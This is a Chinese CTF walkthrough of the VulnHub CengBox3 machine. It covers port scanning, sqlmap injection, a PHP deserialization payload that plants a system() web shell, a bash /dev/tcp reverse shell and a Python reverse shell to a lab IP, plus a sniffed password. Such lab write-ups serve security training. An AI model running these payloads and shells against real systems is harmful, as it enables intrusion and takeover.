vulnhub靶场之CengBox3

这篇具有很好参考价值的文章主要介绍了vulnhub靶场之CengBox3。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

1.信息收集

输入命令:netdiscover -i eth0 -r 192.168.239.0 ,发现181机器存活
vulnhub靶场之CengBox3,网络安全,安全
输入命令nmap -p- -sV -O -Pn -A 192.168.239.181 ,进行端口探测,发现存在22、80、443端口,还发现存在域名ceng-company.vm。
vulnhub靶场之CengBox3,网络安全,安全
将域名ceng-company.vm绑定在/etc/hosts文件中,再到浏览器上访问ceng-company.vm,发现是Agency网站。
vulnhub靶场之CengBox3,网络安全,安全
使用命令searchsploit Agency,搜索存在的历史命令,,查看源码未发现版本信息,逐个尝试未成功。
vulnhub靶场之CengBox3,网络安全,安全
进行目录扫描:gobuster dir -u http://ceng-company.vm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x .zip,.php,.txt,.html,.rar,.php.bak,发现存在poem.txt文件,打开未发现可利用
vulnhub靶场之CengBox3,网络安全,安全
vulnhub靶场之CengBox3,网络安全,安全

进行域名扫描:gobuster vhost --append-domain -u ceng-company.vm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | grep "Status: 200",发现存在dev.ceng-company.vm
vulnhub靶场之CengBox3,网络安全,安全
浏览器访问,发现是一个登录页面。
vulnhub靶场之CengBox3,网络安全,安全
抓包,进行sqlmap注入探测,发现存在sql注入漏洞
vulnhub靶场之CengBox3,网络安全,安全
vulnhub靶场之CengBox3,网络安全,安全

2.漏洞利用

在获取数据库的时候,发现获取不到,猜测有过滤,看到sqlmap提示字符“>”似乎是由后端服务器过滤,使用–tamper=between进行绕过。
vulnhub靶场之CengBox3,网络安全,安全
输入命令:sqlmap -r sql.txt --random-agent --batch --level 3 --risk 3 -D MySql --tamper=between -D cengbox -T users -C "login,name,password" --dump,来获取用户名与密码。
vulnhub靶场之CengBox3,网络安全,安全
添加评论,发现PHP序列号,猜测存在PHP反序列化漏洞
vulnhub靶场之CengBox3,网络安全,安全

data=O:4:"Poem":3:{s:8:"poemName";s:4:"1345";s:10:"isPoetrist";O:8:"poemFile":2:{s:8:"filename";s:22:"/var/www/html/poem.txt";s:8:"poemName";s:4:"1345";}s:9:"poemLines";s:3:"789";}

vulnhub靶场之CengBox3,网络安全,安全
构造POC:O:4:"Poem":3:{s:8:"poemName";s:4:"1345";s:10:"isPoetrist";O:8:"poemFile":2:{s:8:"filename";s:22:"/var/www/html/pin1.php";s:8:"poemName";s:19:"<?php phpinfo(); ?>";}s:9:"poemLines";s:3:"789";}(需要经过url编码),利用成功。
vulnhub靶场之CengBox3,网络安全,安全
构造命令执行的exp:O:4:"Poem":3:{s:8:"poemName";s:4:"1345";s:10:"isPoetrist";O:8:"poemFile":2:{s:8:"filename";s:21:"/var/www/html/cmd.php";s:8:"poemName";s:27:"<?php system($_GET[123]);?>";}s:9:"poemLines";s:3:"789";}(需要经过url编码),执行命令成功。
vulnhub靶场之CengBox3,网络安全,安全
vulnhub靶场之CengBox3,网络安全,安全

3.提权

反弹shell,bash -c "exec bash -i &>/dev/tcp/192.168.239.131/1234 <&1"
vulnhub靶场之CengBox3,网络安全,安全
vulnhub靶场之CengBox3,网络安全,安全
上传pspy64s,进行信息收集,发现存在login.py。
vulnhub靶场之CengBox3,网络安全,安全
因为是定时执行的任务,目标主机又安装有tcpdump,故使用tcpdump来抓取目标主机的流量,抓取3分钟左右。
vulnhub靶场之CengBox3,网络安全,安全
vulnhub靶场之CengBox3,网络安全,安全
将抓取到的流量下载到本地上,并使用strings进行查看,发现用户eric的密码为:3ricThompson*Covid19
vulnhub靶场之CengBox3,网络安全,安全
切换到eric,往login.py文件中写入反弹,并监听端口,反弹成功,权限为root。

echo "'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.239.131",1478));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'" > login.py

vulnhub靶场之CengBox3,网络安全,安全vulnhub靶场之CengBox3,网络安全,安全文章来源地址https://www.toymoban.com/news/detail-607388.html

到了这里,关于vulnhub靶场之CengBox3的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • vulnhub DC-9靶场

    目录 1.信息收集 2.漏洞发掘 3.横向渗透 4.提升权限 4.1构造用户行,写入/etc/passwd 4.2构造权限行,写入/etc/sudoers 扫描主机 sudo arp-scan -l 扫描端口,发现只有80端口 nmap -p- 192.168.42.150 扫描80开放的服务 nmap -p 80 -A -V 192.168.42.150 访问主页面 发现有查找功能,猜测此处有sql注入漏洞 测

    2024年02月05日
    浏览(37)
  • breach-1--vulnhub靶场

    一、环境搭建 下载靶场Breach: 1 ~ VulnHub 描述 VM 配置了静态 IP 地址 (192.168.110.140),因此需要将仅主机适配器配置到此子网。 网络设置也可用其他模式 网络模式:NAT 靶机地址: 192.168.110.140 kali地址:192.168.110.128 二、信息收集 (1)nmap 端口扫描 所有端口都开放,应该是对扫

    2024年02月15日
    浏览(44)
  • vulnhub DC-1靶场

    目录 1.扫描主机 2.得到shell(2.1,2.2)只用一种即可 2.1开始msf漏洞利用 2.2脚本exp得到反弹shell 3.开始提权 sudo arp-scan -l 扫描端口 nmap -p- 192.168.42.147 扫描主机指纹,发现Drupal 7 cms mfconsole search drupal search 7600 use exploit/unix/webapp/drupal_drupalgeddon2 set rhosts 192.168.42.147 run 看到这个,说

    2024年02月05日
    浏览(45)
  • vulnhub DC-4靶场

    目录 1.信息收集 2.漏洞利用 3.横向渗透 4.提升权限 搜索到ip sudo arp-scan -l 查看ip开放端口 nmap -p- 192.168.42.148 查找指纹,没有收获 查找目录,无敏感信息 访问网站,发现只有登录框,猜测为弱密码或密码爆破 bp爆破成功(为了节省时间,我假设知道username,爆破真的太慢了)

    2024年02月05日
    浏览(90)
  • 【VulnHub靶场】——CHRONOS: 1

    作者名:Demo不是emo  主页面链接 : 主页传送门 创作初心: 一切为了她 座右铭: 不要让时代的悲哀成为你的悲哀 专研方向: 网络安全,数据结构 每日emo: 要做个明亮的人,要有个珍藏的故事,要看遍山河日落,要不虚此行。  从10月中旬开始制定了 为期24周的打靶训练

    2024年02月09日
    浏览(36)
  • vulnhub DC-5靶场

    目录 1.信息收集 2.网站分析 3.漏洞利用 4.提升权限 扫描主机 sudo arp-scan -l 扫描端口 nmap -p- 192.168.42.149 扫描指纹 whatweb 192.168.42.149 查看端口详细服务 nmap -A -p- -v 192.168.42.149 扫描目录 dirbuster 浏览网站,发现都是静态页面 只有contact.php有上传窗口 尝试上传,发现问题copyright旁的

    2024年02月05日
    浏览(40)
  • Vulnhub之Lazysysadmin靶场

    目录 一. 环境搭建 二. 渗透过程 1. 信息收集 1.1主机发现 1.2端口扫描 1.3目录扫描 2. 信息漏洞利用 2.1靶机目录信息搜集: 3. Getshell 3.1ssh弱口令 3.2信息收集 4. 提权 5.*反推,其他思路* 5.1提权后的信息收集: 总结 Lazysysadmin靶场下载: https://download.vulnhub.com/lazysysadmin/Lazysysadmin

    2023年04月09日
    浏览(43)
  • vulnhub covfefe靶场

    目录 1.信息收集 2.资源分析 3.漏洞利用 4.提升权限 扫描出多个IP nmap只发现192.168.42.146有端口开放,为22,80,31337 扫描192.168.42.146的22,80,31337端口,看看开放的服务 用dirb找找目录 查看robots.txt,寻找目录 访问taxes,拿到flag1 进入ssh目录,下载rsa,pub 下载了ssh的公钥和私钥,开放

    2024年02月05日
    浏览(32)
  • vulnhub靶场之ORASI: 1

    攻击机:虚拟机kali、本机win10。 靶机:Orasi: 1,下载地址:https://download.vulnhub.com/orasi/Orasi.ova,下载后直接vbox打开即可。 知识点:hex编码、ida逆向、AndroidKiller逆向、ffuf爆破、ssti漏洞、shell反弹、敏感信息发现、信息利用。 隐藏信息:Hint : just one useless little dot,在下载时发

    2023年04月11日
    浏览(25)
  • 【VulnHub靶场】Hackable: III

    在找到目标靶机后,我们首先使用nmap工具来进行初步的信息收集 Command used: nmap -sV -p- 192.168.31.180 通过扫描我们可以得知80端口是开启状态,访问后得到以下界面 查看其源代码 我们可以得到一条注释 “Please, jubiscleudo, don’t forget to activate the port knocking when exiting your section, an

    2023年04月09日
    浏览(31)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包